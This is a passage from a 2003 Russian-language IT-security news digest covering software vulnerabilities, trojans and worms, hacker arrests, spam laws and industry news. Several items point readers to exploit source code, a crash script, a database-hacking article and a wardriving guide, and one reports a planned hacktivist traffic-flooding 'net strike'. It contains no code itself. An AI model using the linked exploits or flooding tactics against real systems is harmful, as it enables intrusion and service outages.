в директории /temp c именами "a" (собственно, сам троян) и "r" (список открытых портов). В поднявшейся на Западе шумихе почему-то вызывает удивление полнейшее молчание отечественных антивирусных компаний. Пресс - релиз - http://www.lancope.com/news/Virus_Alert_Trojan.htm
25/06/2003 14:45 Уязвимость в WebAdmin.exe.
Mark Litchfield от имени английской компании, занимающейся безопасностью, NGSSoftware сообщает о наличии уязвимости в утилите webadmin.exe, предназначенной для удалённого управления администраторами MDaemon, RelayFax и WorldClient. Переполнение буфера, которое может быть получено при передаче параметру USER слишком длинной строки, позволяет выполнить в системе код с системными привилегиями, поскольку процесс webadmin.exe запускается как системный процесс. Производитель утилиты, компания ALTN, выпустила патч. Товарисч с ником wirepair тем временем выпустил исходник эксплоита для платформы win32. Подробности - http://www.nextgenss.com/advisories/webadmin_altn.txt Эксплоит - http://sh0dan.org/files/wa_exp.c
25/06/2003 14:11 Уязвимость в Symantec Security Check.
Symantec Security выпущен бюллетень по безопасности, в котором констатируется наличие уязвимости в ActiveX-компоненте под названием Symantec RuFSI Utility Class или Symantec RuFSI Registry Information Class. Symantec security Check - онлайновый Вэб-сервис, позволяющий проверить свою машину на наличие вирусов и уязвимостей. При этом вышеназванная ActiveX-компонента устанавливается на машину клиента (%SystemRoot%\Downloaded Program Files\rufsi.dll). Как указывает обнаруживший уязвимость Cesar Cerrudo, работа этого компонента не документирована, однако, можно сделать вывод, что он занимается сбором информации о компьютере для дальнейшего онлайнового анализа. Переполнение буфера присутствует в методе CompareVersionStrings. При передаче в качестве одного из параметров этому методу длинной строки можно вызвать переполнение буфера в стеке, что позволяет выполнить на уязвимой машине произвольный код. Подобное переполнение может быть выполнено при посещении "клиентом" специальным образом оформленного Вэб-сайта. Кроме того, DLL, которая отвечает этому компоненту помечена как "safe", что позволяеит обойти ограничения зоны безопасности IE. Symantec произведено обновление DLL и при посещении сайта происходит автоматическое обновление на более новую версию. Специалисты по безопасности, тем не менее, выразили обеспекоенность такому отношению Symantec к безопасности и высказали удивление, почему такой важный компонент ActiveX не использует цифровой сертификат, подписанный доверенным CA-центром, что являлось бы логичным. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0185.html
25/06/2003 11:37 Intel и университеты создают всемирную сеть.
Корпорация Intel, а также Принстонский университет, Калифорнийский университет в Беркли и ряд других академических и коммерческих гигантов объединили усилия с целью устранения перебоев в циркуляции данных по земному шару. PlanetLab — это экспериментальная сеть, образованная поверх интернета. Она позволит исследователям и разработчикам тестировать и создавать приложения, легко опоясывающие планету. Со временем работа, выполненная в рамках проекта PlanetLab, сделает возможным одновременное скоординированное бесперебойное широкое вещание на массы пользователей из компьютеров, разбросанных по всему миру. А специалисты по безопасности получат возможность раньше обнаруживать эпидемии новых вирусов или атаки. «Наша цель — создать игровое поле, где люди смогут проверять свои идеи, — говорит Дейв Куллер, профессор Беркли и менеджер лаборатории Intel при этом университете. — В будущем приложения должны сами распространяться по большей части планеты». Многие принимают всемирные коммуникации как нечто само собой разумеющееся, но интернет не является стабильной и бесперебойной сетью, как должно быть. Серверы могут выходить из строя, а излишние перескоки маршрутизатора — создавать задержки. В будущем эти проблемы только усугубятся, так как появятся новые приложения и услуги. По мере того как корпорации переносят жизненно важные приложения в интернет, сотрудники все чаще жалуются на медленный доступ и плохую защиту. Подробнее - http://www.zdnet.ru/?ID=302630
25/06/2003 10:34 Билл Гейтс: борьба со спамом - приоритетная задача Microsoft.
Билл Гейтс в интервью журналистам Reuters назвал кампанию по борьбе со спамом приоритетной. "Это чума, пользующаяся уникальными возможностями интернета", - сказал г-н Гейтс. "Подобные высказывания показывают, что Microsoft предпримет серьезные усилия по борьбе со спамом. Спам - основная причина того, что люди разочаровываются в интернете, что, в свою очередь, может повредить продажам персональных компьютеров", - утверждает аналитик независимой компании Directions on Microsoft Матт Роузофф. Ранее сообщалось, что Microsoft подала 15 исков против организаций и отдельных лиц, которые, как утверждает корпорация, несут ответственность за более чем два миллиарда "мусорных" сообщений, поступивших в ее интернет-отделение. В апреле Microsoft совместно с компаниями AOL Time Warner и Yahoo! решили бороться с распространением спама и созданием ложных электронных адресов. Источник - http://www.cnews.ru
25/06/2003 10:09 Арестован Американский Ниндзя.
В Калифорнии был арестован студент, которого обвиняют во взломе компьютерной системы во время университетских выборов. Незадачливый хакер собственноручно отдал сотни голосов в поддержку выдуманного кандидата, которого он назвал Американский Ниндзя. 21-летний Шон Нематбахш специализировался в области компьютерной науки в Калифорнийском университете в Риверсайде. Однако вряд ли он вернется на студенческую скамью в ближайшее время. За хранение наркотиков и несанкционированное изменение компьютерных данных ему грозит 3 года тюремного заключения и 10 тысяч долларов штрафа. На данный момент подозреваемый выпущен под залог в $10 000. По словам представителей администрации вуза, Нематбахш подал 800 несуществующих избирательных голосов. Тем самым, он вынудил университет считать итоги выборов недействительными и провести избрание нового студенческого правления в последующий месяц. Сам Шон заявил в полиции, что всего лишь хотел продемонстрировать несовершенство и уязвимость компьютерной сети учебного заведения. Источник - http://www.runet.ru
25/06/2003 09:29 Cкоро начнётся регистрация доменнных имён в домене .SU.
22 июня 2003 г., в соответствии с Регламентом приоритетной регистрации доменных имен в домене SU, закончился период приоритетной регистрации доменных имен, соответствующих зарегистрированным товарным знакам. Все заказы на регистрацию доменных имен в зоне SU, сделанные в период приоритетной регистрации, но по каким-либо причинам не исполненные, удалены из базы данных RU-CENTER. C 27 июня 2003 г., в соответствии с решением Фонда Развития Интернет (ФИД), в домене SU начнется открытая регистрация доменных имен. Прием заявок на регистрацию доменных имен в домене SU начнется 27 июня 2003 г. в 00:00 по московскому времени и будет осуществляться в соответствии с Регламентом регистрации доменов в домене SU. Подробности - http://www.nic.ru/news/2003/06.23.html
25/06/2003 09:03 Акция протеста у офиса компании SCO.
Разработчики Linux и пользователи этой операционной системы продолжают выражать свой протест по поводу действий компании SCO, утверждающей, что в коде Linux имеются фрагменты, незаконно скопированные из Unix. Для выражения своего протеста линуксоиды используют самые разные методы - от публикации развернутых ответов на претензии SCO до небезуспешных обращений в суд. На прошедшей неделе свою лепту в протестное движение внесли линуксоиды, проживающие недалеко от штаб-квартиры SCO, расположенной в Линдоне, в штате Юта. Местная организация Provo Linux Users Group, как явствует из ее названия, объединяющая местных пользователей Linux, организовала около штаб-квартиры SCO пикет. Линуксоиды прибыли к офису SCO с заранее заготовленными транспарантами с надписями вроде "Я использую Linux: ну и что?", прихватив с собой и детей. По заявлениям самих организаторов, в акции протеста приняли участие до 70 человек. Наблюдали за акцией около сотни зрителей, среди которых было немало представителей прессы. Пресса, впрочем, оценивает число участников акции скромнее - человек в сорок. Сама акция продолжалась около двух часов. Источник - http://www.compulenta.ru
24/06/2003 15:49 В Москве ликвидирован интернет-магазин, продававший пиратские диски.
В Москве сотрудниками милиции пресечена деятельность одного из интернет-магазинов, владельцы которого занимались реализацией контрафактных DVD и CD. Как сообщили РБК в пресс-службе Главного управления по борьбе с экономическими преступлениями (ГУБЭП) МВД России, в ходе спецоперации был задержан житель Москвы, который занимался закупкой нелицензионных дисков у нелегальных производителей, а затем реализовывал их через интернет. Контрафактная продукция распространялась партиями от 1 тыс. дисков на территории Москвы и других регионов РФ. В результате четырех обысков, проведенных сотрудниками ГУБЭП МВД РФ и УБЭП ГУВД Москвы, из незаконного оборота было изъято 25 тыс. дисков с фильмами и музыкальными произведениями, авторские права на которые принадлежат российским и зарубежным правообладателям, а также 20 тыс. единиц полиграфии на сумму более 10 млн. руб., бухгалтерская и иная документация, свидетельствующая о распространении контрафактной продукции. В настоящее время по данному факту Тверской межрайонной прокуратурой Москвы возбуждено уголовное дело, продолжается проведение оперативно-следственных мероприятий по выявлению мест изготовления контрафактной продукции на электронных носителях. Источник - http://www.cnews.ru
24/06/2003 13:12 Уязвимость в PerlEdit.
PerlEdit является интегрированной средой разработки (IDE) для Perl, а также многоцелевым редактором. Было обнаружено, что при запуске PerlEdit он открывает локальный TCP-порт 1956. Если подключиться (например, при помощи telnet) к этому порту, PerlEdit благополучно упадёт. Источник - http://www.securityfocus.com
24/06/2003 12:13 Скрипт для переполнения буфера в IE.
Наш соотечественник Digital Scream опубликовал скрипт, который сваливает Internet Explorer версий 5.5-6.0. Скрипт - http://archives.neohapsis.com/archives/bugtraq/2003-06/0173.html
24/06/2003 11:33 Microsoft модернизирует ОС Windows Mobile.
Компания Microsoft объявила о модернизации программного обеспечения Pocket PC для PDA, а также ребрендинге всех своих программных продуктов для мобильных ОС. Отныне программные продукты Microsoft для мобильных устройств будут продвигаться под брендом Windows Mobile. Новая версия Pocket PC, полное имя которого Windows Mobile 2003 software for Pocket PCs работает на базе Windows CE 4.2 и уже получило поддержку ведущих производителей, среди которых такие компании как Dell, HP иToshiba, пишет Silicon.com. В новой версии существенно улучшены технологии беспроводной передачи данных, отправки и получения сообщений, а также улучшены параметры доступа к различным медиа-файлам. Кроме того, Windows Mobile 2003 осуществляет поддержку IPSec и легко конфигурируется с беспроводными сетями. Windows Mobile 2003 работает с Windows Media Player 9.0, позволяя пользователю карманного компьютера работать с видео и аудио-файлами. Подробности - http://www.silicon.com/news/500018-500001/1/4791.html?rolling=1
24/06/2003 11:01 Недельный отчет о вирусах Panda Software.
Компания Panda Software выпустила очередной недельный отчёт о вирусах, в котором рассматриваются три трояна, наиболее распространённые на прошедшей неделе: Danvee (W32/Danvee), Sobig.D (W32/Sobig.D) и Mofei.B (W32/Mofei.B). Danvee – это вредоносный код, запрограммированный на завершение определенных процессов на заражаемых им компьютерах. Таким образом, он временно приостанавливает работу определенных приложений, в том числе антивирусов и межсетевых экранов. О черве Sobig.D мы писали на прошлой неделе. Mofei.B – это червь, распространяющийся по сетям и снабженный функциями троянца, поэтому у него есть возможность удаленного доступа к компьютеру, а также перехвата данных, вводимых с клавиатуры. Благодаря этим компонентам червь может получать информацию с зараженного компьютера, такую, как размер свободного дискового пространства, метка тома, тип процессора, IP адрес и т.п. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=169
24/06/2003 10:47 Компания Apple представила самый быстрый персональный компьютер.
Компания Apple Computer Inc. в понедельник представила новый Macintosh с процессором G5, созданным IBM, который может одновременно оперировать в два раза большим количеством данных, чем любой другой персональный компьютер, сообщает CNN. Три модели компьютера Macintosh на базе G5, который является 64-разрядным микропроцессором, появятся в продаже в августе 2003 года. В настоящее время на всех современных персональных компьютерах установлен 32-разрядный микропроцессор. "G5 изменил все правила. Power Mac G5 на базе 64-разрядного микропроцессора - теперь самый быстрый компьютер в мире", - заявил один из основателей компании Apple Стив Джобс (Steve Jobs). Power Mac G5 в конфигурации 1,6 ГГц будет стоить 1999 долларов, 1,8 ГГц - 2399 долларов, цена на компьютер с двумя процессорами с частотой 2 ГГц будет начинаться от 2999 долларов. Кроме того, в понедельник была представлена новая операционная система OS X с кодовым названием Panther, поставки которой планируется начать еще до конца года . Подробности - http://www.cnn.com/2003/TECH/ptech/06/23/apple.new.reut/index.html
24/06/2003 10:05 Microsoft сворачивает программу поддержки WinNT 4.0.
Microsoft начнет сворачивание поддержки Windows NT 4.0 в конце следующей недели, вынуждая сотни тысяч пользователей переходить на новую ОС. Множество других широко распространенных платформ были свернуты компанией в последние несколько лет. А с 1 июля и пользователи NT Workstation 4.0 будут ограничены лишь доступом в онлайновый форум взаимопомощи. Телефонная поддержка, обновления и исправление ошибок станут дополнительной услугой и будут осуществляться только при личном контакте. Поскольку это, как правило, дорогое удовольствие, пользователям придется переходить на альтернативную ОС. Следующей за NT4 уйдет в историю Windows 98, поддержка которой прекратиться 16 января будущего года. А в конце 2004 года закончится поддержка Windows NT Server 4.0. Онлайновая поддержка всех систем продолжается в течение года после прекращения предоставления основного пакета техподдержки. Впрочем, онлайновые материалы по NT4.0 для самостоятельного изучения будут доступны, по крайней мере, до конца 2005 года. Некоторые наблюдатели считают, что принудительный переход на новые ОС является несвоевременным и эксплуататорским. Хотя, с другой стороны, действия Microsoft достаточно понятны. Ну, а тем, кто не может проститься со старой доброй NT4, остается лишь готовить деньги для оплаты персональной техподдержки системы. Источник - http://www.computeractive.co.uk/
24/06/2003 09:42 Очередной сотрудник Microsoft арестован за кражу ПО.
Бывший сотрудник Microsoft был арестован вчера, 23 июня, по подозрению в том, что он заказал по льготной внутренней цене корпорации программные продукты более чем на $17 млн., а затем продавал их, присваивая себе разницу. Дело сорокатрехлетнего Ричард Грегга также включает еще 62 эпизода мошенничества, связанного с компьютерами и интернетом. Как утверждает обвинение, Грегг заказал с января по декабрь 2002 года 5436 программных продуктов по оптовой цене и затем спекулировал ими. Следствие ведут Федеральное бюро расследований и прокуратура Западного округа Вашингтона. Грегг, отказавшийся признать себя виновным, был уволен из Microsoft в декабре 2002 года. Он был координатором проекта по разработке Windows, и именно это стало причиной введения в конце прошлого года более строгой системы предотвращения краж в компании. "Когда в конце декабря мы узнали о том, что происходит, то немедленно предприняли меры для предотвращения повторения этого и сообщили о Грегге правоохранительным органам, - сказал финансовый директор Microsoft Джон Коннорс, который также осуществляет надзор за состоянием внутри корпорации. - С этого времени мы очень тесно сотрудничали с ФБР и прокуратурой и ввели изменения в нашу систему внутренних заказов". Microsoft провел следствие и ввел новую систему борьбы с нарушениями внутренней политики компании после увольнения и ареста в 2002 году менеджера Дэниэла Фойсснера, обвинявшегося в продаже купленного по льготной цене ПО. Фойсснер позднее умер в местной больнице. Источник - http://www.cnews.ru
23/06/2003 17:21 Текст интервью (чата) с Александром Слуцким.
Состоялся чат с Александром Слуцким. На сайте www.securitylab.ru опубликован его полный текст. Конечно же, то, что там опубликовано можно с большим трудом назвать интервью или пресс-конференцией ввиду самой специфики чата. Скорее это напоминало ответы человека, который пытался ответить на кучу вопросов, одновременно свалившихся на него. Но, тем не менее, довольно любопытно было узнать ответы на некоторые вопросы. Пользуясь случаем, хотелось бы поблагодарить PigKiller-а с Securitylab за выкладывание полного текста. :) Текст чата - http://www.securitylab.ru/?ID=38516
23/06/2003 13:52 Международная Конференция QNX 2003.
Как сообщает nixp.ru, 19 и 20 ноября в Санкт-Петербурге пройдет 7-ая Международная Конференция QNX 2003 - ежегодная тематическая конференция по системам реального времени и встраиваемым системам. На ней будет представлено: - самая свежая информация от производителей; - обзоры существующих решений; - мастер-классы ведущих технических специалистов; - прекрасные возможности обмена опытом; - и, естественно, многое другое. Cайт конференции - http://www.qnx-russia.ru/
23/06/2003 11:58 20 июня - День Освобождения GIF.
Патент США номер 4,558,302, защищающий алгоритм сжатия LZW, использующийся в популярном формате графических файлов GIF, сегодня (20 июня 2003) теряет свою силу. Это значит, что создателям редакторов изображений больше не придется платить никаких отчислений компании Unisys. Web-сайты также смогут размещать у себя картинки в формате GIF, не опасаясь юридических последствий (до сих пор многие из них, в частности, официальный сайт GNU, старались не делать этого "по патентным соображениям"). Конечно, все это произойдет лишь в том случае, если срок действия патента не будет продлен. Источник - http://www.linuxcenter.ru.
23/06/2003 11:37 Турин: западные хакеры cозывают Форум для выхода из тени.
По сообщению La Republica, сегодня в Турине открывается 6-я встреча Hackmeeting. Организаторы называют ее "встречей итальянских обществ и цифровых контркультур". В течение трех дней итальянские хакеры будут общаться в центре El Barriо, в помещении бывшей школы, превращенной по этому поводу в лабораторию высоких компьютерных технологий: здесь будут выставлены сотни компьютеров, радиопередающих устройств, сотовых телефонов, пейджеров, радиосканеров и всего того, что принесут сюда участники встречи. В прошлом году в Болонье собралось 1500 компьютерщиков со всей Европы. На этот раз организаторы надеются, что все пройдет еще лучше. Уже зарегистрировались делегации из Австралии, Испании, Хорватии, Франции. После нескольких лет отсутствия во встрече примут участие немцы из Chaos Computer Club, одной из самых первых хакерских групп в Европе. Все едут в Турин. Но чем они там будут заниматься? Hackmeeting, по словам одного из участников, всегда организовывался для придания формы идеям и действиям тех, кто смешивает хакерство с политикой". В Турине будут говорить о правительстве Сети, о бесплатном программном обеспечении, о цифровом копирайте. Но будут обсуждаться и другие проблемы, потому что hacktivism - это прежде всего действие, а хакеры тесно связаны с "движениями". Во время саммита в Генуе они применили свои знания для распространения контринформации в реальном времени. С тех пор сотрудничество с движениями глобалистов и неоглобалистов не свелось на нет. Одной из первых акций встречи станет организация "net strike" против Швейцарии, страны, где происходили столкновения с силами правопорядка: тысячи навигаторов нацелятся на государственные сайты и будут их перегружать трафиком до тех пор, пока они не обрушатся. Подробности - http://www.oxpaha.ru/view.asp?9285
23/06/2003 11:03 Чат с главным "компьютерным" милиционером Москвы.
Как сообщил сайт anfrax.ru, cегодня, 23 июня с с 15 до 16 часов, в чате «Московского Комсомольца» на вопросы будет отвечать начальник отдела по борьбе с компьютерными правонарушениями Управления по борьбе с преступлениями в сфере высоких технологий ГУВД Москвы Александр Слуцкий. Желающие могут задать свои вопросы в надежде получить на них компетеные ответы. Чат - http://chat.mk.ru/
23/06/2003 10:32 ФБР вступает в войну с пиринговыми сетями.
В четверг в Конгресс США поступил новый законопроект, согласно которому агенты Федерального бюро расследований будут подключаться к судебном преследованию нарушителей авторского права. В первую очередь под пристальный взор агентов ФБР попадут пользователи пиринговых сетей, незаконно распространяющие нелицензированную музыку. Как сообщает CNET News.com, новый законопроект под названием Piracy Deterrence and Education Act of 2003 инструктирует ФБР заняться разработкой программы, которая бы позволяла отслеживать в режиме реального времени трафик и передвижение защищенных копирайтом материалов. ФБР также займется разработкой предупреждающего документа, который должен стать сигналом для нарушителей копирайта о том, что они находятся под подозрением ФБР. В случае обнаружения нарушения авторских прав, правообладатели будут посылать нарушителю предупреждающий документ под печатью ФБР, где будет ясно расписано, что ожидает цифрового преступника за его деяния. Авторы законопроекта, борцы за авторское право и интеллектуальную собственность Ламар Смит и Ховард Берман более года работали над текстом Piracy Deterrence and Education Act of 2003, главная задача которого остановить расцвет нелегальных пиринговых сетей и распространение через Сеть защищенных материалов. Источник - http://www.internet.ru
23/06/2003 10:08 Власти Литвы отключили сервер "Кавказ-центра".
Департамент госбезопасности Литвы закрыл сайт чеченских боевиков "Кавказ-центр", сообщает РИА "Новости". Согласно вердикту независимых экспертов, сайт "Кавказ-центр" распространяет информацию, связанную с пропагандой терроризма, разжиганием национальной и религиозной ненависти. Об этом заявил представитель госбезопасности Литвы по связям с общественностью Витаутас Макаускас. Сервер, обслуживавший "Кавказ-центр", был отключен на прошлой неделе. Источник - http://www.rian.ru
23/06/2003 09:55 Спамеры начинают и проигрывают.
На прошлой неделе Комитет по коммерции Сената США после непродолжительных обсуждений принял путем голосования два законопроекта: устанавливающий уголовную ответственность за распространение спама и (второй) наделяющий органы, призванные бороться со спамерами, расширенными полномочиями. Наблюдатели отмечают, что оба закона были приняты с минимальным количеством споров - проблема максимально ясна и понятна, требуются немедленные законодательные меры. В одобренном Комитетом проекте закона, назначающего ответственность за распространение спама, предусматривается наказание до 1 года тюремного заключения и максимальные штрафы до 1 млн. USD. Размеры штрафа зависят от того, скрывал ли спамер свой настоящий обратный адрес, пользовался ли сразу несколькими почтовыми эккаунтами с целью обмануть фильтры провайдера и пользователей. Подавать на спамеров в суд смогут провайдеры доступа в интернет и прокуроры штатов, частным лицам пока решили подобную возможность не давать. Сенат также решил предоставить расширенные полномочия Федеральной комиссии по торговле, с целью облегчения выслеживания и последующей экстрадиции спамеров, находящихся за пределами границ США. Источник - http://www.viruslist.ru
22/06/2003 12:41 Обнаружен абсолютно новый вид сетевого трояна.
Информационный портал eweek сообщает о том, что многие специалисты компьютерной безопасности крайне озабочены появлением абсолютно нового трояна, осуществляющего сетевое сканирование. Первыми его предварительный анализ осуществили господа из ISS (Internet Security Systems Inc.), которые определили его, как троян осуществляющий распределённое сканирование и содержащий также сетевого агента, деструктивные действия которого не активированы, однако (после анализа кода) было высказано предположение, что червь может быть доработан для выполнения деструктивных функций. С лёгкой руки ISS червь получил название Stumbler. О действиях червя проинформировал мировой сетевое сообщество Dan Ingevaldson - глава компании ISS. Червь представляет собой Linux-бинарник, который "проживает" в директории /tmp. Произвольным образом выбрав IP-адрес и диапазон портов, троян осуществляет сканирование хоста, посылая SYN-пакеты, при этом источник посылки посылается подменённым (спуффинг). Одной из отличительных особенностей трояна, позволяющего идентифицировать посылку им сетевых пакетов является размер TCP-окна (TCP window size), равный 55808 байт. Этот размер заставил экспертов предположить, что первоначальным источником был Randex IRC-бот, однако затем было высказано мнение, что размер был выбран случайно. В настоящий момент о трояне оповещены подразделения ФБР и Департамент Безопасности Отечества США (Department of Homeland Security). Первоначально присутствие подозрительной активности сетевого сканирования было замечено 16 мая. Также о предварительном анализе кода червя сообщила компания Intrusec, Inc., которая назвала его 55808 Trojan. Подробный анализ кода трояна занял бы очень много места, поэтому оставляем нашим посетителям возможность самостоятельно ознакомиться с особенностями и поведением нового червя, для чего и приводим ссылку на анализ трояна от Intrusec, Inc. Хотелось бы отметить, что в письме Intrusec утверждается, что этот тип червя представляет собой тип трояна 3-го поколения, идеи которого были описаны ранее Lancope. Подробности - http://www.eweek.com/article2/0,3959,1132253,00.asp Анализ трояна - http://www.intrusec.com/55808.html
22/06/2003 11:07 Cтатья "Взлом базы данных".
Ребята из российской команды GipsHackers Crew опубликовали довольно любопытный перевод статьи, посвящённой описанию технологии взлома баз данных. Состоит из частей: предистория, использование 80 порта HTTP, продвинутый взлом БД, используя ошибочные сообщения ODBC, юзаем 1434 порт (порт SQL), админам: как залатать баг, послесловие. Читайте, набирайтесь ума-разума. ;) Статья - http://gipshack.ru/text/sql/database.php
22/06/2003 10:59 Защита телефонов от кражи.
В Швейцарии на деле стали применять возможность получения уникальных идентификационных номеров телефонов (IMEI) операторами. Так, оператор Swisscom Mobile первым в стране начал блокировать телефоны, IMEI-номера которых числятся в списках украденных. Планируется, что позднее сервис будет введен и другими операторами и станет общенациональным. На данный момент блокировке могут подвергнуться любой из телефонов дата производства, которых начинается с июня 2002 года (введен новый стандарт IMEI), а также требуется, чтобы аппарат был подключен не на prepaid тариф. В последнем случае, препятствием для блокировки аппарата становится невозможность определения его реального владельца, при покупке prepaid контрактов не требуется предоставления паспортных данных. Под блокировкой аппаратов понимается невозможность их работы в сети конкретного оператора, достаточно сменить сеть (переставив SIM-карту) и аппарат заработает. Следует рассматривать появление такой инициативы в Швейцарии как первую ласточку, ранее подобные «черные» списки появились в Австралии, Великобритании. Наиболее передовой опыт накоплен именно на австралийском континенте, здесь законодательная база для борьбы с кражами мобильных телефонов наиболее сильная. Источник - http://www.mobile-review.com
22/06/2003 10:34 Обзор Zaurus C700.
Ранее мы проанонсировали статью о вардрайвинге с использованием КПК Zaurus. Как раз о подобном КПК опубликована статья Александра Еремеева, посвящённая обзору модели C700, выпускаемой фирмой Sharp и построенной на базе ОС Linux. Обзор - http://www.mobile-review.com/pda/review/sharp-zaurus-c700.shtml
22/06/2003 10:05 Старый порновирус восстал из ада.
В Сети снова активно распространяется вирус, о существовании которого вполне реально было забыть еще несколько лет назад. Однако далеко не все пользователи заботятся о защите своих компьютеров и потому зачастую игнорируют такую нужную «мелочь» как патчи. Этим с успехом пользуются создатели вирусов. Новая версия давно известного червя Fortnight использует для саморассылки «дыру» в программном обеспечении компании Microsoft, «заплатка» для которой вышла три года назад. По данным антивирусной компании Sophos, как и масса других червей, Fortnight F рассылается через адресную книгу почтовой программы Outlook. Нынешняя версия старого вируса использует JavaScript и Java-апплет, если почтовая программа поддерживает чтение в формате HTML. Зараженное письмо имеет скрытую ссылку на веб-страницу, которая открывается при отображении содержания письма. В итоге червь, используя «дыру» в Microsoft VM ActiveX, автоматически загружается с сайта на компьютер получателя вируса. Червь пытается изменить реестр и добавляет в папку «Избранное» веб-браузера ссылку на порнографические сайты Nude Nurses, Search You Trust и Your Favorite Porn Links. Источник - http://www.cnews.ru
22/06/2003 09:42 Белоруссия хочет контролировать интернет?
"Закладывается определенный пароль имени в интернете, и определенная информация на территории Белоруссии распространяться не будет". Эта фраза из интервью министра информации Белоруссии Михаила Подгайного минскому проправительственному еженедельнику "Обозреватель" белорусскими поборниками свободы слова воспринята как реальная угроза. Министр утверждает, что технически возможно и "достаточно просто" отсечь Белоруссию от нежелательной информации. В то же время Михаил Подгайный задается вопросом, нужно ли это делать, и замечает: "мы европейская страна и, я думаю, что нам нужно думать не о том, как запрещать, а как регулировать эти вопросы". Но политики, журналисты, независимые юристы в Минске всерьез встревожены возможным скорым запретом на получение и распространение информации через "всемирную паутину". Техническая возможность таких ограничений была, по мнению многих, продемонстрирована 9 сентября 2001 года - в день президентских выборов был заблокирован интернет-сайт негосударственной "Белорусской деловой газеты", где в режиме реального времени были обещаны и начали появляться сведения о ходе голосования. Подробнее - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_2995000/2995460.stm
22/06/2003 09:29 Минпечати предлагает лицензировать производство компьютерных программ.
Минпечати предпринимает очередные попытки для пресечения правонарушений авторского права в сфере производства компьютерных программ и баз данных данных в перечень лицензируемых видов деятельности. Как сообщает пресс-центр ФЦП "Электронная Россия" такое решение было принято в четверг на заседании экспертного совета по противодействию нарушениям в сфере интеллектуальной собственности. В настоящее время такой перечень определен законом "О лицензировании отдельных видов деятельности". Кроме того, экспертный совет принял решение подготовить к следующему своему заседанию согласованный проект постановления правительства по минимальным ставкам авторского вознаграждения. В Минпечати отметили, что к сентябрю этого года также должна быть завершена подготовка предложений по формированию комплексной системы мер, необходимых для пресечения правонарушений в сфере авторского права и смежных прав. Подробности - http://e-rus.ru/news/2003/06/191504_5808.shtml
22/06/2003 09:18 Статья "Вардрайвинг с Zaurus".
На сайте Дмитрия Леонова (dl) www.bugtraq.ru опубликована довольно любопытная статья под названием "Вардрайвинг с Zaurus", представляющая собой перевод с французского (автор - eprom). Фактически это пошаговое руководство (HOWTO) по использованию КПК Zaurus для поиска точек подключения к беспроводной сети (wardriving). Как пишет автор, для осуществления необходимо иметь: Zaurus модели SL-5xxx (стоимость около 500 евро, против 1200 у ноутбука), беспроводную флеш-карту, беспроводное соединение (прямое (p2p) или через точку доступа) для загрузки файлов (или USB), cредние знания в области сетей. ПО для Zaurus предлагается стрить на основе ОС Linux и ПО для этой ОС. Статья - http://www.bugtraq.ru/library/security/zaurus.html
21/06/2003 12:28 "Русский журнал" переходит от слов к действию.
Если два месяца назад Русский журнал призывал сетевую общественность забомбить Центр Американского английского (ALC) телефонными звонками, то теперь "главный спаммер" Рунета не отделается простым отключением телефона. Сегодня РЖ проводит очередную акцию протеста против спама - народу велено явиться прямо под окна офиса ALC предварительно взяв с собой небольшой камень, либо, хммм.... спичечный коробок с образчиком кала. Сегодня, 21 июня, автор Русского Журнала предлагает всем тем, у кого спам вызывает отвращение и потерю аппетита явится по адресу 1-й Бабьегородский пер 5/7; 3 этаж, офис #1, где и распологается пресловутый Центр. Инструкции следующие: каждый протестант должен принести с собой небольшой камень, либо спичечный коробок с образчиком кала и иметь с собой сопроводительную записку, в которой будет написано, что это - камень, не полетевший пока в окно американского языка. Что делать со спичечным коробком устроители акции оставили на совести пришедших. Далее, все это добро следует оставить под дверью ALC, а в случае если вас примут - вручить их как сувенир. Подробнее об акции - http://www.russ.ru/netcult/20030610_zheglov.html
21/06/2003 11:53 Сервер сингапурской партии превратили в порносайт.
Сингапурская газета The Straits Times сообщает об очередном взломе политического сайта. Ранее на этой неделе хакеры взломали сайт правящей лейбористской партии Великобритании. Новым пострадавшим от действий хакеров стал сайт оппозиционной Сингапурской демократической партии. Неизвестные хакеры взломали его и разместили на месте политических новостей и воззваний порнографию под заголовком: Mature Sex: Experience Is Everything. Технические специалисты компании отследили хакеров по IP-адресу, выяснив, что они откуда-то из Польши. Большего сделать никто не смог, даже доменное www.singaporedemocrats.org имя осталось в распоряжении хакеров. Партии же пришлось в срочном порядке переехать на резервный адрес www.singaporedemocrat.org. Источник - http://www.compulenta.ru
21/06/2003 11:20 По интернету бродит секретный поисковый робот Microsoft.
На нынешней неделе некоторые веб-мастеры обратили внимание на то, что по их сайтам начал ходить новый поисковый робот, представляющийся как MSNBot. Ранее подобный робот в Сети не появлялся. Из названия нового поискового робота становится ясно, что он принадлежит корпорации Microsoft, а точнее ее интернет-подразделению MSN. Позднее на сайте MSN появилось разъяснение по поводу MSNBot. Как следует из этого документа, MSNBot является экспериментальным поисковым роботом, разработанным в подразделении MSN Search. Пока этот робот находится на стадии испытаний, и собранная им информация не используется поисковым сайтом MSN. Он, как и раньше, продолжает базироваться на поисковом движке Inktomi и системе размещения платных ссылок от Overture. Далее в разъяснении MSN описываются способы запрета индексирования сайтов или отдельных их разделов, и наоборот, включения тех или иных ресурсов в список индексируемых. О планах Microsoft по интеграции нового робота в принадлежащий MSN поисковый сайт в компании ничего не сообщают. Подробности - http://search.msn.com/msnbot.htm
21/06/2003 11:04 Cтатья "Настройка RedHat 9 на русскую локаль KOI8-R".
На linux.org.ru McMCC проинформировал ширящиеся массы поклонников ОС Linux о выпуске статьи под названием "Настройка RedHat 9 на русскую локаль KOI8-R". Из вступления: "В свое время, после выхода в свет RedHat версии 8.0, мною была написана статья "Переход с RedHat-7.x на RedHat-8.0", в которой описывалось как заменить локаль UTF-8 на KOI8-R в связи глючности и проблемности русской локали UTF-8, с выходом RedHat версии 9 казалось, что эту проблему решили и русская локаль UTF-8 заработала как надо, правда не везде гладко, но решаемо. Однако многие пользователи RH9 хотят старую хорошо отработанную временем локаль KOI8-R, оно и понятно, UTF-8 все еще имеет проблемы с консольными приложениями, да и с некоторым старым софтом, от которого не хочется отказываться. Видимо по этой причине меня стали забрасывать письмами с просьбой рассказать как сделать такой переход, у меня нашлось немного времени это сделать, поэтому выполняю просьбу тех, кто меня об этом просил". Статья - http://mcmcc.bat.ru/rh9koi/
21/06/2003 10:19 Локальная уязвимость в traceroute.
